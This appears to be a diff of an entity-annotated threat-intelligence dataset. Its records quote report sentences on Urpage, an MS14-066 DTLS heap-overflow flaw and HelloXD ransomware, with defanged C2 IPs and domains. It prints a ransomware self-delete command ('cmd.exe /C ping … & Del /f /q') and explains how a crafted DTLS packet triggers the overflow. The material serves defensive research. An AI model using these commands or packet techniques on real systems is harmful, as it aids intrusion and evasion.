Targets","entities":[{"id":5685,"label":"threat-actor","start_offset":3,"end_offset":9},{"id":5686,"label":"threat-actor","start_offset":10,"end_offset":17},{"id":5687,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":5688,"label":"threat-actor","start_offset":28,"end_offset":37},{"id":5689,"label":"malware","start_offset":39,"end_offset":46},{"id":5693,"label":"malware","start_offset":118,"end_offset":125},{"id":5694,"label":"malware","start_offset":179,"end_offset":187},{"id":5695,"label":"threat-actor","start_offset":309,"end_offset":318},{"id":5697,"label":"malware","start_offset":369,"end_offset":375},{"id":5700,"label":"malware","start_offset":439,"end_offset":451},{"id":5701,"label":"malware","start_offset":460,"end_offset":467},{"id":5702,"label":"malware","start_offset":484,"end_offset":493},{"id":5703,"label":"malware","start_offset":502,"end_offset":514},{"id":47059,"label":"SOFTWARE","start_offset":155,"end_offset":162},{"id":47060,"label":"malware","start_offset":376,"end_offset":382}],"relations":[],"Comments":[]} -{"id":1937,"text":"We did not find Urpage victims in our telemetry, likely because of the targeted nature of these attacks.","entities":[{"id":5704,"label":"threat-actor","start_offset":16,"end_offset":22}],"relations":[],"Comments":[]} -{"id":1938,"text":"However, the domains used by Urpage provided hints about its target.","entities":[{"id":45185,"label":"threat-actor","start_offset":29,"end_offset":35}],"relations":[],"Comments":[]} -{"id":1939,"text":"For one, there is the domain pikrpro[.]eu and its subdomains—the islamicfinderfeedback[.]pikrpro[.]eu and the memrifilesforinfo[.]pikpro[.]eu.","entities":[{"id":47063,"label":"DOMAIN","start_offset":110,"end_offset":141},{"id":47061,"label":"DOMAIN","start_offset":29,"end_offset":41},{"id":47062,"label":"DOMAIN","start_offset":65,"end_offset":101}],"relations":[],"Comments":[]} -{"id":1941,"text":"Additionally, many of the files related to the Urpage domains are auto-extractable files that drop Delphi or VB backdoor and open a decoy document.","entities":[{"id":47065,"label":"threat-actor","start_offset":47,"end_offset":53}],"relations":[],"Comments":[]} -{"id":1942,"text":"The decoy documents tell more about Urpage's possible targets, as it contains text from articles about the region of Kashmir.","entities":[{"id":47066,"label":"threat-actor","start_offset":36,"end_offset":42},{"id":47067,"label":"location","start_offset":117,"end_offset":124}],"relations":[{"id":300,"from_id":47066,"to_id":47067,"type":"targets"}],"Comments":[]} -{"id":1943,"text":"The header for a sample document can be seen below.","entities":[],"relations":[],"Comments":[]} -{"id":1944,"text":" The documents can also be image files with the same theme, as can be seen here. Multiple Android applications further drive this notion, as they provide services based on the interests of users in that region.","entities":[],"relations":[],"Comments":[]} -{"id":1945,"text":"They have a malicious application that provides services for religion, as well as popular sports in the region.","entities":[],"relations":[],"Comments":[]} -{"id":1946,"text":" Figure 3. Malicious application for observing Ramadan Figure 4.","entities":[],"relations":[],"Comments":[]} -{"id":1947,"text":"Malicious application for cricket news Solutions and Mitigation Taking note of these similarities and connections can help organizations and users in their continued defense against Urpage, Bahamut, Confucius, and Patchwork.","entities":[{"id":47070,"label":"threat-actor","start_offset":199,"end_offset":208},{"id":47071,"label":"threat-actor","start_offset":214,"end_offset":223},{"id":47068,"label":"threat-actor","start_offset":182,"end_offset":188},{"id":47069,"label":"threat-actor","start_offset":190,"end_offset":197}],"relations":[],"Comments":[]} -{"id":1948,"text":"The connection of Urpage to the other three threat actors demonstrate that cyberattacks don’t exist in silos and that it hints at a circulation of knowledge and technologies that help in the continuing evolution of different malicious campaigns.","entities":[{"id":47072,"label":"threat-actor","start_offset":18,"end_offset":24}],"relations":[],"Comments":[]} -{"id":1949,"text":"Given this knowledge, organizations must be more vigilant in monitoring threats, as changes in one may mean that changes in others could follow.","entities":[],"relations":[],"Comments":[]} -{"id":1950,"text":"Organizations can develop defenses against the social engineering component these four threat actors have in common.","entities":[],"relations":[],"Comments":[]} -{"id":1951,"text":"Users should be able to identify the indicators of a social engineering campaign.","entities":[],"relations":[],"Comments":[]} -{"id":1952,"text":"Paying close attention to the domain name of a website before performing any further action can also help mitigate threats, including threats like Urpage that have targeted victims.","entities":[{"id":47073,"label":"threat-actor","start_offset":147,"end_offset":153}],"relations":[],"Comments":[]} -{"id":1953,"text":"As an additional defense against the growing use of malicious mobile applications, enterprises and end users can benefit from multilayered mobile security solutions such as Trend Micro™ Mobile Security for Android™ which is also available on Google Play.","entities":[{"id":45192,"label":"SOFTWARE","start_offset":242,"end_offset":253},{"id":45193,"label":"SOFTWARE","start_offset":173,"end_offset":214}],"relations":[],"Comments":[]} -{"id":1954,"text":"Trend Micro’s Mobile App Reputation Service (MARS) covers Android and iOS threats using leading sandbox and machine learning technologies.","entities":[{"id":47075,"label":"SOFTWARE","start_offset":58,"end_offset":65},{"id":47074,"label":"SOFTWARE","start_offset":0,"end_offset":50},{"id":47076,"label":"SOFTWARE","start_offset":70,"end_offset":74}],"relations":[],"Comments":[]} -{"id":1955,"text":"It can protect users against malware, zero-day and known exploits, privacy leaks, and application vulnerability.","entities":[{"id":47077,"label":"attack-pattern","start_offset":38,"end_offset":46},{"id":47079,"label":"attack-pattern","start_offset":86,"end_offset":111},{"id":47080,"label":"attack-pattern","start_offset":29,"end_offset":36},{"id":47081,"label":"attack-pattern","start_offset":67,"end_offset":80},{"id":47078,"label":"attack-pattern","start_offset":51,"end_offset":65}],"relations":[],"Comments":[]} -{"id":1956,"text":"For organizations, Trend Micro™ Mobile Security for Enterprise provides device, compliance and application management, data protection, and configuration provisioning.","entities":[{"id":45194,"label":"SOFTWARE","start_offset":19,"end_offset":62}],"relations":[],"Comments":[]} -{"id":1957,"text":"It also protects devices from attacks that leverage vulnerabilities, preventing unauthorized access to apps, as well as detecting and blocking malware and fraudulent websites.","entities":[],"relations":[],"Comments":[]} -{"id":1958,"text":"The Trend Micro™ Deep Discovery™ threat protection platform enables organizations to detect, analyze, and respond to modern threats such as sophisticated malware, targeted attacks, and APTs.","entities":[{"id":47082,"label":"SOFTWARE","start_offset":4,"end_offset":32}],"relations":[],"Comments":[]} -{"id":1959,"text":"Trend Micro™ Smart Protection for Endpoints with Maximum XGen™ security infuses high-fidelity machine learning into a blend of threat protection techniques to eliminate security gaps across user activity and any endpoint, offering the broadest possible protection against advanced attacks.","entities":[{"id":47083,"label":"SOFTWARE","start_offset":0,"end_offset":62}],"relations":[],"Comments":[]} -{"id":1960,"text":"This appendix contains the latest Indicators of Compromise (IOCs) related to the different groups. Tags Mobile | APT & Targeted Attacks | Research","entities":[],"relations":[],"Comments":[]} -{"id":1961,"text":"Microsoft recently released a patch for a critical vulnerability in Microsoft Secure Channel (aka Schannel).","entities":[{"id":47084,"label":"identity","start_offset":0,"end_offset":9},{"id":47085,"label":"SOFTWARE","start_offset":68,"end_offset":107}],"relations":[],"Comments":[]} -{"id":1962,"text":" This vulnerability is being referred to as MS14-066.","entities":[{"id":45196,"label":"vulnerability","start_offset":44,"end_offset":52}],"relations":[],"Comments":[]} -{"id":1963,"text":" The patch addressing CVE-2014-6321 fixed many areas within schannel.dll, including at least two vulnerabilities related to the handling of the Datagram Transport Layer Security (DTLS) protocol.","entities":[{"id":47086,"label":"vulnerability","start_offset":22,"end_offset":35},{"id":47087,"label":"FILEPATH","start_offset":60,"end_offset":72}],"relations":[],"Comments":[]} -{"id":1964,"text":" DTLS is used by Microsoft Remote Desktop Protocol (RDP) to provide communications privacy for datagram protocols.","entities":[{"id":47088,"label":"SOFTWARE","start_offset":17,"end_offset":56}],"relations":[],"Comments":[]} -{"id":1965,"text":"The DTLS protocol is used by Microsoft Windows Remote Desktop Gateway (RDG) to establish a secure channel between the RDG client and RDG server (described in detail in [MS_TSGU].pdf). The RDG client initiates the DTLS connection by sending a ClientHello to the RDG Server. The RDG server then responds with a DTLS Hello Verify Request that contains a cookie; this is used as a denial of service countermeasure.","entities":[{"id":47089,"label":"SOFTWARE","start_offset":29,"end_offset":75},{"id":47090,"label":"FILEPATH","start_offset":168,"end_offset":181}],"relations":[],"Comments":[]} +{"id":13781,"text":"Meanwhile, the second payload is a typical Waterbear first-stage backdoor.","entities":[],"relations":[],"Comments":[]} +{"id":8210,"text":"A little over two weeks before the registration of the fake domain, the attackers sent the following email to the company: Figure 6.","entities":[],"relations":[],"Comments":[]} +{"id":3378,"text":" 2243c10b1bd64dfb55eda08bc8b85610d7fa5ba759527b4b4dd16dfac584ef25","entities":[{"id":10223,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} +{"id":4649,"text":"Host: {C2}","entities":[],"relations":[],"Comments":[]} +{"id":7336,"text":"on Host","entities":[],"relations":[],"Comments":[]} +{"id":9340,"text":"Trend Micro detects both of the threats as AndroidOS_CallerSpy.HRX.","entities":[],"relations":[],"Comments":[]} +{"id":682,"text":"In a similar way to embedding Adobe Flash files into an Office document, you can also embed equations in documents that will be parsed by Microsoft Equation Editor - a program that lets you easily write mathematical equations: Figure 2. Microsoft Equation Editor As in our previous example, vulnerabilities in the equation editor can be exploited by leveraging malicious Office documents.","entities":[{"id":46257,"label":"SOFTWARE","start_offset":30,"end_offset":41},{"id":46258,"label":"SOFTWARE","start_offset":138,"end_offset":163},{"id":46256,"label":"SOFTWARE","start_offset":238,"end_offset":263}],"relations":[],"Comments":[]} +{"id":3006,"text":"This will also protect these apps on your tablets, smartphones, PCs and Macs.","entities":[],"relations":[],"Comments":[]} +{"id":12815,"text":"Joint Operations.","entities":[],"relations":[],"Comments":[]} +{"id":3302,"text":" GetBrowsersCookies This command is designed to steal cookie information from browsers.","entities":[],"relations":[],"Comments":[]} +{"id":3427,"text":"Backdoor.","entities":[],"relations":[],"Comments":[]} +{"id":12977,"text":"We look forward to continuing our work in this space and advancing the safety and security of our users around the world.","entities":[{"id":40404,"label":"location","start_offset":53,"end_offset":56},{"id":40405,"label":"tools","start_offset":71,"end_offset":77},{"id":40406,"label":"location","start_offset":78,"end_offset":81},{"id":40407,"label":"location","start_offset":82,"end_offset":90},{"id":40408,"label":"location","start_offset":115,"end_offset":120}],"relations":[],"Comments":[]} +{"id":5839,"text":"Ed: Exactly.","entities":[],"relations":[],"Comments":[]} +{"id":623,"text":"One technique includes the ETERNALBLUE exploit tool.","entities":[{"id":2083,"label":"malware","start_offset":28,"end_offset":39}],"relations":[],"Comments":[]} +{"id":847,"text":" Kernel APC attacks do this using their control over the kernel to redirect APCs: \u201cAsynchronous Procedure Calls\u201d.","entities":[{"id":46395,"label":"attack-pattern","start_offset":1,"end_offset":19}],"relations":[],"Comments":[]} +{"id":2622,"text":" If you think you may be subject to an active attack or have an urgent matter, get in touch with the Unit 42 Incident Response team or call North America Toll-Free: 866.486.4842 (866.4.UNIT42), EMEA: +31.20.299.3130, APAC: +65.6983.8730, or Japan: +81.50.1790.0200.","entities":[{"id":45625,"label":"location","start_offset":241,"end_offset":246},{"id":45627,"label":"location","start_offset":217,"end_offset":221},{"id":45624,"label":"location","start_offset":140,"end_offset":153},{"id":45626,"label":"location","start_offset":194,"end_offset":198},{"id":45623,"label":"identity","start_offset":101,"end_offset":131}],"relations":[],"Comments":[]} +{"id":1519,"text":" The Src IP Begin and End are the start and ending IP ranges used as a fake src addresses in the DNS DDoS. The IP range can also be controlled by global variables within the binary itself as well.","entities":[],"relations":[],"Comments":[]} +{"id":3299,"text":"Figures 21 and 22 show the result of running \u201cSnsInfo\u201d command to enumerate messengers.","entities":[],"relations":[],"Comments":[]} +{"id":9493,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} +{"id":9404,"text":"Used to suppress its icon from being displayed to the user in the application launcher to hide the fact that it is installed Discovery File and Directory Discovery T1420","entities":[{"id":28948,"label":"attack-pattern","start_offset":135,"end_offset":163}],"relations":[],"Comments":[]} +{"id":2506,"text":"shell13.jsp","entities":[{"id":47674,"label":"FILEPATH","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} +{"id":3474,"text":"Protux, a known backdoor, is executed by abusing the rundll32 dynamic-link library (DLL).","entities":[{"id":49273,"label":"malware","start_offset":0,"end_offset":6},{"id":49274,"label":"attack-pattern","start_offset":41,"end_offset":88}],"relations":[{"id":777,"from_id":49273,"to_id":49274,"type":"uses"}],"Comments":[]} +{"id":1030,"text":"Accounts made through this site \"can be used to apply [for] related memberships of Amazon Prime, Microsoft Developer, Adobe and Apple by some secret ways,\" one seller said.","entities":[{"id":46519,"label":"identity","start_offset":83,"end_offset":95},{"id":46522,"label":"identity","start_offset":128,"end_offset":133},{"id":46520,"label":"identity","start_offset":97,"end_offset":106},{"id":46521,"label":"identity","start_offset":118,"end_offset":123}],"relations":[],"Comments":[]} +{"id":1481,"text":"The app developer industry is booming.","entities":[],"relations":[],"Comments":[]} +{"id":1416,"text":" Geographic Distribution of Koluoz Spam Nodes in North America Thus far we\u2019ve detected the following command and control servers in use.","entities":[{"id":45013,"label":"Infrastucture","start_offset":35,"end_offset":45},{"id":45016,"label":"Infrastucture","start_offset":103,"end_offset":121},{"id":45012,"label":"malware","start_offset":28,"end_offset":34},{"id":45014,"label":"location","start_offset":49,"end_offset":62}],"relations":[{"id":55,"from_id":45012,"to_id":45013,"type":"communicates-with"},{"id":56,"from_id":45013,"to_id":45014,"type":"located-at"}],"Comments":[]} +{"id":950,"text":"The apps this library is embedded in may be legitimate and have significant functionality, but their developer\u2019s choice to use this library has put them at risk. Technical Details:","entities":[],"relations":[],"Comments":[]} +{"id":14254,"text":" C&C Server's IP Address Port Number 160[.]16[.]243[.]129 443 (HTTPS) 160[.]16[.]243[.]129 53 (DNS) 160[.]16[.]243[.]129 80 (HTTP) 174[.]139[.]203[.]18 443 (HTTPS) 174[.]139[.]203[.]18 53 (DNS) 174[.]139[.]203[.]20 53 (DNS) 174[.]139[.]203[.]22 443 (HTTPS) 174[.]139[.]203[.]22 53 (DNS) 174[.]139[.]203[.]27 53 (DNS) 174[.]139[.]203[.]34 53 (DNS) 174[.]139[.]62[.]58 80 (HTTP) 174[.]139[.]62[.]60 443 (HTTPS) 174[.]139[.]62[.]60 53 (DNS) 174[.]139[.]62[.]60 80 (HTTP) 174[.]139[.]62[.]61 443 (HTTPS) 61[.]195[.]98[.]245 443 (HTTPS) 61[.]195[.]98[.]245 53 (DNS) 61[.]195[.]98[.]245 80 (HTTP) 67[.]198[.]161[.]250 443 (HTTPS) 67[.]198[.]161[.]250 53 (DNS) 67[.]198[.]161[.]251 443 (HTTPS) 67[.]198[.]161[.]252 443 (HTTPS) Figure 6: IP addresses used for C&C communication, and the port numbers they use","entities":[{"id":44095,"label":"IPV4","start_offset":37,"end_offset":57},{"id":44096,"label":"IPV4","start_offset":70,"end_offset":90},{"id":44097,"label":"IPV4","start_offset":100,"end_offset":120},{"id":44098,"label":"IPV4","start_offset":131,"end_offset":151},{"id":44099,"label":"IPV4","start_offset":164,"end_offset":184},{"id":44100,"label":"IPV4","start_offset":194,"end_offset":214},{"id":44101,"label":"IPV4","start_offset":224,"end_offset":244},{"id":44102,"label":"IPV4","start_offset":257,"end_offset":277},{"id":44103,"label":"IPV4","start_offset":287,"end_offset":307},{"id":44104,"label":"IPV4","start_offset":317,"end_offset":337},{"id":44105,"label":"IPV4","start_offset":347,"end_offset":366},{"id":44106,"label":"IPV4","start_offset":377,"end_offset":396},{"id":44107,"label":"IPV4","start_offset":409,"end_offset":428},{"id":44108,"label":"IPV4","start_offset":438,"end_offset":457},{"id":44109,"label":"IPV4","start_offset":468,"end_offset":487},{"id":44110,"label":"IPV4","start_offset":500,"end_offset":519},{"id":44111,"label":"IPV4","start_offset":532,"end_offset":551},{"id":44112,"label":"IPV4","start_offset":561,"end_offset":580},{"id":44113,"label":"IPV4","start_offset":591,"end_offset":611},{"id":44114,"label":"IPV4","start_offset":624,"end_offset":644},{"id":44115,"label":"IPV4","start_offset":654,"end_offset":674},{"id":44116,"label":"IPV4","start_offset":687,"end_offset":707}],"relations":[],"Comments":[]} +{"id":10156,"text":"By looking at the digital fingerprints of these phishing sites and comparing them with a large data set that spans almost five years, we can uniquely relate them to a couple of Pawn Storm incidents in 2016 and 2017.","entities":[{"id":30989,"label":"attack-pattern","start_offset":48,"end_offset":56},{"id":30990,"label":"location","start_offset":57,"end_offset":62},{"id":30991,"label":"location","start_offset":63,"end_offset":66},{"id":30992,"label":"location","start_offset":77,"end_offset":81},{"id":30993,"label":"location","start_offset":89,"end_offset":94},{"id":30995,"label":"location","start_offset":137,"end_offset":140},{"id":30996,"label":"location","start_offset":157,"end_offset":161},{"id":30999,"label":"location","start_offset":206,"end_offset":209}],"relations":[],"Comments":[]} +{"id":4811,"text":"During our investigation into the Turla CyberAzov apps, we identified another Android app first seen in the wild in March 2022 that also claimed to conduct DoS attacks against Russian websites.","entities":[{"id":50729,"label":"SOFTWARE","start_offset":78,"end_offset":89},{"id":50730,"label":"TIME","start_offset":116,"end_offset":126},{"id":50731,"label":"attack-pattern","start_offset":156,"end_offset":159},{"id":50727,"label":"threat-actor","start_offset":34,"end_offset":39},{"id":50728,"label":"malware","start_offset":40,"end_offset":49}],"relations":[{"id":998,"from_id":50727,"to_id":50728,"type":"uses"}],"Comments":[]} +{"id":3940,"text":"xml;charset","entities":[],"relations":[],"Comments":[]} +{"id":9825,"text":"Gets MAC address and volume information to send back to the C&C. Executes only during working hours (8:00AM-6:00PM, using kernel32.GetLocalTime API)","entities":[{"id":29957,"label":"location","start_offset":17,"end_offset":20},{"id":29958,"label":"location","start_offset":74,"end_offset":78},{"id":29959,"label":"TIME","start_offset":101,"end_offset":121}],"relations":[],"Comments":[]} +{"id":7796,"text":"However, while initial analysis of the macro it used made us believe that this was from TA505, the macros\u2019 obfuscation and style turned out to be more similar to the ones described in this post, based on the code page, senders, and fast flux.","entities":[{"id":24146,"label":"location","start_offset":53,"end_offset":57},{"id":24148,"label":"location","start_offset":119,"end_offset":122},{"id":24149,"label":"location","start_offset":189,"end_offset":193},{"id":24150,"label":"malware","start_offset":213,"end_offset":217},{"id":24151,"label":"location","start_offset":228,"end_offset":231}],"relations":[],"Comments":[]} +{"id":1420,"text":"WildFire users can rest assured that they\u2019ll be protected from whatever Kuluoz has in-store next.","entities":[{"id":46758,"label":"SOFTWARE","start_offset":0,"end_offset":8},{"id":46759,"label":"malware","start_offset":72,"end_offset":78}],"relations":[],"Comments":[]} +{"id":6471,"text":"The name SharpChisel may be related to the purpose of this file, which is a C# wrapper for a tunneling tool called chisel.","entities":[{"id":20113,"label":"location","start_offset":21,"end_offset":24},{"id":20114,"label":"location","start_offset":103,"end_offset":107},{"id":20115,"label":"malware","start_offset":115,"end_offset":121}],"relations":[],"Comments":[]} +{"id":5041,"text":"We also send all targeted Gmail and Workspace users government-backed attacker alerts notifying them of the activity.","entities":[{"id":51125,"label":"SOFTWARE","start_offset":36,"end_offset":45},{"id":51124,"label":"SOFTWARE","start_offset":26,"end_offset":31}],"relations":[],"Comments":[]} +{"id":9309,"text":"Billing address (city) bill_to_zip nn","entities":[],"relations":[],"Comments":[]} +{"id":832,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} +{"id":2811,"text":" Unit 42 is following this situation very closely and will update this blog with any new information as it becomes available.","entities":[{"id":45705,"label":"identity","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} +{"id":581,"text":"Palo Alto Networks customers are further protected from ransomware.","entities":[{"id":46178,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} +{"id":2475,"text":"This particular webshell will load a base64 encoded class that will contain the functionality desired by the actor.","entities":[],"relations":[],"Comments":[]} {"id":1966,"text":" The RDG client responds once again with a Client Hello packet containing the received cookie, which will initiate the DTLS handshake (RFC6347 Section 4.2). Figure 1: Initiation of the DTLS handshake between RDG client and server Figure 2: RDG client and server handshake phase (Source: [MS-TSGU] Section 1.3.3.1.1)","entities":[],"relations":[],"Comments":[]} -{"id":1967,"text":"Before starting analysis, we needed to set up a test environment.","entities":[],"relations":[],"Comments":[]} -{"id":1968,"text":"For the RDG server we referred to the following walkthrough: http:\/\/terrytlslau.tls1.cc\/2014\/01\/deploying-remote-desktop-gateway-in.html.","entities":[{"id":45199,"label":"URL","start_offset":61,"end_offset":136}],"relations":[],"Comments":[]} -{"id":1969,"text":" Now let’s explore these vulnerabilities.","entities":[],"relations":[],"Comments":[]} -{"id":1970,"text":" When a client sends the DTLS ClientHello packet to the server, the server computes a Message Authentication Code (MAC) on it and compares it to the cookie contained in the packet.","entities":[],"relations":[],"Comments":[]} -{"id":1971,"text":"But the server only checks the cookie length field, not whether the cookie buffer can be read.","entities":[],"relations":[],"Comments":[]} -{"id":1972,"text":"In fact, a 32 byte length is always read, which could lead to a buffer out-of-bounds condition.","entities":[],"relations":[],"Comments":[]} -{"id":1973,"text":" It should be noted that a client could send a crafted packet to the server without needing to start an RDP session.","entities":[],"relations":[],"Comments":[]} -{"id":1974,"text":"Figure 3, below, shows a packet crafted to display a “Cookie Length” of 32 (32 is equivalent to 0x20 in hexadecimal), which does not match the actual amount of data in the cookie (shown containing only two 0x41 characters).","entities":[],"relations":[],"Comments":[]} -{"id":1975,"text":" Figure 3: A crafted packet sending mismatched size and content Related code is found in the DTLSCookieManager::ValidateCookie function: As shown above, although the server checks the “CookieSize” field, the compared length is always *(_DWORD *)(mgr + 16)), whose value is 0x20; however, the real cookie buffer length could be less than 0x20.","entities":[],"relations":[],"Comments":[]} -{"id":1976,"text":"A crafted packet could set the “CookieSize” field to 0x20 and have the actual cookie buffer contain less than 0x20 bytes of data. When a DTLS client receives a HelloVerifyRequest packet with a CookieSize larger than 32 bytes the client does not properly validate the CookieSize value against the amount of cookie data in the packet.","entities":[],"relations":[],"Comments":[]} -{"id":1977,"text":"This scenario can result in a heap overflow.","entities":[{"id":47091,"label":"attack-pattern","start_offset":30,"end_offset":43}],"relations":[],"Comments":[]} -{"id":1978,"text":"It should be noted that if you want modify the “CookieSize“ value, you should modify the other length fields to keep the packet structure valid, as shown below in Figure 4.","entities":[],"relations":[],"Comments":[]} -{"id":1979,"text":"Figure 4: An example of a properly modified DTLS packet cookie ","entities":[],"relations":[],"Comments":[]} -{"id":1980,"text":"We can see the first packet is a normal ClientHello sent by the client, and the second packet is a crafted packet sent by the server. In order to examine exploitation of this vulnerability, we used WinDBG to attach to the lsass.exe process.","entities":[{"id":47093,"label":"FILEPATH","start_offset":223,"end_offset":232},{"id":47092,"label":"SOFTWARE","start_offset":199,"end_offset":205}],"relations":[],"Comments":[]} -{"id":1981,"text":"Below, Figure 5 shows what the call stack looks like when the process crashes.","entities":[],"relations":[],"Comments":[]} -{"id":1982,"text":" Figure 5: WinDBG view of call stack when lsass.exe process crashes due to exploitation Vulnerable code is found in the CSsl3TlsClientContext::DigestServerHelloVerifyRequest function: Palo Alto Networks is releasing signature 37094 and 37059 to defend against these vulnerabilities.","entities":[{"id":47094,"label":"SOFTWARE","start_offset":11,"end_offset":17},{"id":47095,"label":"identity","start_offset":186,"end_offset":204}],"relations":[],"Comments":[]} -{"id":1983,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":1984,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":1985,"text":" By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} -{"id":1986,"text":"This post is also available in: 日本語 (Japanese) HelloXD is a ransomware family performing double extortion attacks that surfaced in November 2021.","entities":[{"id":45202,"label":"malware","start_offset":53,"end_offset":60},{"id":45203,"label":"TIME","start_offset":137,"end_offset":150},{"id":45205,"label":"attack-pattern","start_offset":95,"end_offset":111}],"relations":[{"id":81,"from_id":45202,"to_id":45205,"type":"uses"}],"Comments":[]} -{"id":1987,"text":"During our research we observed multiple variants impacting Windows and Linux systems.","entities":[{"id":47096,"label":"SOFTWARE","start_offset":60,"end_offset":67},{"id":47097,"label":"SOFTWARE","start_offset":72,"end_offset":77}],"relations":[],"Comments":[]} -{"id":1988,"text":"Unlike other ransomware groups, this ransomware family doesn’t have an active leak site; instead it prefers to direct the impacted victim to negotiations through TOX chat and onion-based messenger instances.","entities":[{"id":47098,"label":"SOFTWARE","start_offset":162,"end_offset":165}],"relations":[],"Comments":[]} -{"id":1989,"text":" Unit 42 performed an in-depth analysis of the ransomware samples, the obfuscation and execution from this ransomware family, which contains very similar core functionality to the leaked Babuk\/Babyk source code.","entities":[{"id":45206,"label":"identity","start_offset":1,"end_offset":8},{"id":5874,"label":"threat-actor","start_offset":187,"end_offset":192},{"id":47099,"label":"threat-actor","start_offset":193,"end_offset":198}],"relations":[],"Comments":[]} -{"id":1990,"text":"It was also observed that one of the samples deployed MicroBackdoor, an open-source backdoor allowing an attacker to browse the file system, upload and download files, execute commands, and remove itself from the system.","entities":[{"id":5878,"label":"malware","start_offset":54,"end_offset":67}],"relations":[],"Comments":[]} -{"id":1991,"text":"We believe this was likely done to monitor the progress of the ransomware and maintain an additional foothold in compromised systems.","entities":[],"relations":[],"Comments":[]} -{"id":1992,"text":" During the analysis of the MicroBackdoor sample, Unit 42 observed the configuration and found an embedded IP address, belonging to a threat actor we believe is potentially the developer: x4k, also known as L4ckyguy, unKn0wn, unk0w, _unkn0wn and x4kme.","entities":[{"id":45216,"label":"threat-actor","start_offset":246,"end_offset":251},{"id":45209,"label":"malware","start_offset":28,"end_offset":41},{"id":45212,"label":"threat-actor","start_offset":207,"end_offset":215},{"id":45210,"label":"identity","start_offset":50,"end_offset":57},{"id":45213,"label":"threat-actor","start_offset":217,"end_offset":224},{"id":45211,"label":"threat-actor","start_offset":188,"end_offset":191},{"id":45214,"label":"threat-actor","start_offset":226,"end_offset":231},{"id":45215,"label":"threat-actor","start_offset":233,"end_offset":241}],"relations":[{"id":87,"from_id":45216,"to_id":45211,"type":"duplicate-of"},{"id":83,"from_id":45212,"to_id":45211,"type":"duplicate-of"},{"id":84,"from_id":45213,"to_id":45211,"type":"duplicate-of"},{"id":85,"from_id":45214,"to_id":45211,"type":"duplicate-of"},{"id":86,"from_id":45215,"to_id":45211,"type":"duplicate-of"},{"id":88,"from_id":45209,"to_id":45211,"type":"authored-by"}],"Comments":[]} -{"id":1993,"text":" Unit 42 has observed x4k in various hacking and non-hacking forums, which has linked the threat actor to additional malicious activity such as: Palo Alto Networks detects and prevents HelloXD and adjacent x4k activity with the following products and services: Cortex XDR and Next-Generation Firewalls (including cloud-delivered security subscriptions such as WildFire).","entities":[{"id":5898,"label":"SOFTWARE","start_offset":262,"end_offset":272},{"id":5891,"label":"identity","start_offset":1,"end_offset":8},{"id":5895,"label":"malware","start_offset":186,"end_offset":193},{"id":5902,"label":"malware","start_offset":361,"end_offset":369},{"id":47100,"label":"threat-actor","start_offset":22,"end_offset":25},{"id":47101,"label":"identity","start_offset":146,"end_offset":164},{"id":47102,"label":"threat-actor","start_offset":207,"end_offset":210}],"relations":[],"Comments":[]} -{"id":1994,"text":"Due to the surge of this malicious activity, we’ve created this threat assessment for overall awareness.","entities":[],"relations":[],"Comments":[]} -{"id":1995,"text":"HelloXD Malware Overview Packer Analyses Ransomware Internals WTFBBQ Pivots Hunting for Ransomware Attribution Conclusion Indicators of Compromise","entities":[{"id":45217,"label":"malware","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} -{"id":1996,"text":"Additional Resources","entities":[],"relations":[],"Comments":[]} -{"id":1997,"text":" HelloXD is a ransomware family first observed in the wild on Nov. 30, 2021.","entities":[{"id":47103,"label":"malware","start_offset":1,"end_offset":8},{"id":47104,"label":"TIME","start_offset":62,"end_offset":75}],"relations":[],"Comments":[]} -{"id":1998,"text":"This ransomware family uses a modified ClamAV logo in their executables.","entities":[{"id":45218,"label":"SOFTWARE","start_offset":39,"end_offset":45}],"relations":[],"Comments":[]} -{"id":1999,"text":"ClamAV is an open-source antivirus engine used to detect malware.","entities":[{"id":47105,"label":"SOFTWARE","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} -{"id":2000,"text":"We also have observed additional samples with different versions of the logo, which led us to believe the ransomware developer may like using the ClamAV branding for their ransomware.","entities":[{"id":47106,"label":"SOFTWARE","start_offset":146,"end_offset":152}],"relations":[],"Comments":[]} -{"id":2001,"text":"Additionally, some of the observed samples include properties information that can be observed in Figure 1.","entities":[],"relations":[],"Comments":[]} -{"id":2002,"text":" The file description included the entry VlahmAV, a play on words on ClamAV, and the developer named the ransomware HelloXD and used another potential alias, uKnow, as the developer of HelloXD in the copyright section.","entities":[{"id":47109,"label":"SOFTWARE","start_offset":69,"end_offset":75},{"id":47111,"label":"malware","start_offset":116,"end_offset":123},{"id":47112,"label":"malware","start_offset":158,"end_offset":163},{"id":47110,"label":"malware","start_offset":185,"end_offset":192}],"relations":[{"id":302,"from_id":47110,"to_id":47112,"type":"duplicate-of"},{"id":301,"from_id":47111,"to_id":47112,"type":"duplicate-of"}],"Comments":[]} -{"id":2003,"text":" When executed, HelloXD tries to disable shadow copies to inhibit system recovery before encrypting files using the following commands embedded in the sample: Additionally the ransomware does a ping to 1.1.1[.]1 and asks to wait a timeout of 3000 milliseconds between each reply, quickly followed with a delete command to delete the initial payload.","entities":[{"id":5922,"label":"malware","start_offset":16,"end_offset":23},{"id":5925,"label":"malware","start_offset":195,"end_offset":199},{"id":5926,"label":"IPV4","start_offset":203,"end_offset":212}],"relations":[],"Comments":[]} -{"id":2004,"text":" cmd.exe \/C ping 1.1.1[.]1 -n 1 -w 3000 > Nul & Del \/f \/q \"C:\\Users\\admin\\Desktop\\xd.exe\"","entities":[{"id":45219,"label":"FILEPATH","start_offset":59,"end_offset":88},{"id":45220,"label":"FILEPATH","start_offset":1,"end_offset":8},{"id":5931,"label":"tools","start_offset":12,"end_offset":16},{"id":5932,"label":"IPV4","start_offset":17,"end_offset":26}],"relations":[],"Comments":[]} -{"id":2005,"text":" Two of the initial set of samples identified create a unique mutex containing the following 